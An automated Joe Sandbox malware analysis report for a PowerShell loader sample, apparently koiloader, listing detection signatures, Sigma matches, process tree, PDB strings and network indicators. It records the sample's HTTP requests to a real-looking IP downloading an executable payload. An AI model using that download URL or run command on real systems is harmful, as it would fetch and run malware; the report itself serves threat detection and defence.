Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1ZhE3yY8rV.ps1

Overview

General Information

Sample name:1ZhE3yY8rV.ps1
renamed because original name is a hash value
Original sample name:e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908.ps1
Analysis ID:1542345
MD5:ea20c34ae2665307c372d81bfe2effda
SHA1:e384870516959d04dd002c52b0f16c30311eaf6f
SHA256:e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908
Tags:217-195-153-196koiloaderps1TMBackdooruser-JAMESWT_MHT
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 8136 cmdline: C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8112, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1", ProcessId: 7552, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8112, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1", ProcessId: 7552, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 1ZhE3yY8rV.ps1Avira: detected
Source: 1ZhE3yY8rV.ps1ReversingLabs: Detection: 31%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
Source: Binary string: System.Configuration.Install.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb0Do source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbJ* source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32* source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb)p source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: CallSite.Targetore.pdb u source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdbMZ@ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbXa source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: softy.pdbathuw source: powershell.exe, 00000000.00000002.2185663505.000001995A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdbH source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.pdbSystem.Management.dllSystem.Xml.ni.dll source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb3 source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: global trafficHTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: unknownTCP traffic detected without corresponding DNS query: 217.195.153.196
Source: global trafficHTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 217.195.153.196Connection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2159022873.0000019943B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.195.153.196
Source: powershell.exe, 00000000.00000002.2159022873.0000019943D23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.195.153.196/assets/paleo
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp, 1ZhE3yY8rV.ps1String found in binary or memory: http://217.195.153.196/assets/paleochorologyma.exe
Source: powershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7620DD0_2_00007FFD9B7620DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028
Source: classification engineClassification label: mal64.evad.winPS1@3/10@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7552
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uavqn0lg.tef.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: 1ZhE3yY8rV.ps1ReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Configuration.Install.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb0Do source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbJ* source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32* source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb)p source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: CallSite.Targetore.pdb u source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdbMZ@ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbXa source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: softy.pdbathuw source: powershell.exe, 00000000.00000002.2185663505.000001995A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdbH source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.pdbSystem.Management.dllSystem.Xml.ni.dll source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb3 source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr

Data Obfuscation

barindex
